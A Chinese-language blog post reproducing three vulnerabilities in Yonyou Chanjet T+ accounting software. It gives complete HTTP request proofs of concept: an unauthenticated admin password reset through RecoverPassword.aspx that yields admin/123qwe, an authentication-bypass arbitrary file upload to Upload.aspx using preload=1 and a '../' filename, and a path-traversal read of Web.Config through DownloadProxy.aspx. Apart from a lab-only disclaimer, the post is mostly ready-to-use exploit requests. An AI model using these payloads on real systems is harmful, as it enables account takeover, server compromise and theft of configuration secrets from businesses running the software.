.jpg)
用友 畅捷通T+ 漏洞复现
文章声明
安全技术类文章仅供参考,此文所提供的信息仅针对漏洞靶场进行渗透,未经授权请勿利用文章中的技术手段对任何计算机系统进行入侵操作。
本文所提供的工具仅用于学习,禁止用于其他目的,推荐大家在了解技术原理的前提下,更好的维护个人信息安全、企业安全、国家安全。
用友 畅捷通T+ RecoverPassword.aspx 管理员密码修改漏洞
一、漏洞描述
用友 畅捷通T+ RecoverPassword.aspx 存在未授权管理员密码修改漏洞,攻击者可以通过该漏洞修改管理员账号密码登录后台
二、漏洞影响
用友 畅捷通
三、漏洞复现
访问首页显示如下
访问下列地址查看是否存在漏洞
http://xx.xx.xx.xx/tplus/ajaxpro/RecoverPassword,App_Web_recoverpassword.aspx.cdcab7d2.ashx.jpg)
可以看到重置密码仅需pwdNew参数
漏洞利用poc如下
POST /tplus/ajaxpro/RecoverPassword,App_Web_recoverpassword.aspx.cdcab7d2.ashx?method=SetNewPwd HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ASP.NET_SessionId=gp3mxvri3leqbqazlatfx5jg
Content-Length: 49
{
"pwdNew":"46f94c8de14fb36680850768ff1b7f2a"
}.jpg)
重置后的系统管理员账号密码为 admin/123qwe
.jpg)
用友 畅捷通T+ Upload.aspx 任意文件上传漏洞
一、漏洞描述
用友 畅捷通T+ Upload.aspx接口存在任意文件上传漏洞,攻击者通过 preload 参数绕过身份验证并进行文件上传,达到获取服务器权限的目的
二、漏洞影响
用友 畅捷通T+ <= 17.x三、漏洞复现
首先访问下列地址查看判断漏洞是否存在
http://xx.xx.xx.xx/tplus/SM/SetupAccount/Upload.aspx?preload=1.jpg)
漏洞利用poc如下
POST /tplus/SM/SetupAccount/Upload.aspx?preload=1 HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 188
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarysHT4cEvOAWALSZEv
Origin: null
Upgrade-Insecure-Requests: 1
------WebKitFormBoundarysHT4cEvOAWALSZEv
Content-Disposition: form-data; name="File1"; filename="../aaaa.txt"
Content-Type: image/jpeg
aaaa
------WebKitFormBoundarysHT4cEvOAWALSZEv--.jpg)
直接访问写入的文件
http://xx.xx.xx.xx/tplus/SM/SetupAccount/aaaa.txt.jpg)
用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞
一、漏洞简介
用友 畅捷通T+ DownloadProxy.aspx文件存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器上的敏感文件
二、漏洞影响
用友 畅捷通
三、漏洞复现
存在漏洞的地址
/tplus/SM/DTS/DownloadProxy.aspx?preload=1&Path=../../Web.Config.jpg)
本文是原创文章,采用 CC BY-NC-ND 4.0 协议,完整转载请注明来自 程序员小航
阅读建议
评论
匿名评论
隐私政策
你无需删除空行,直接评论以获取最佳展示效果
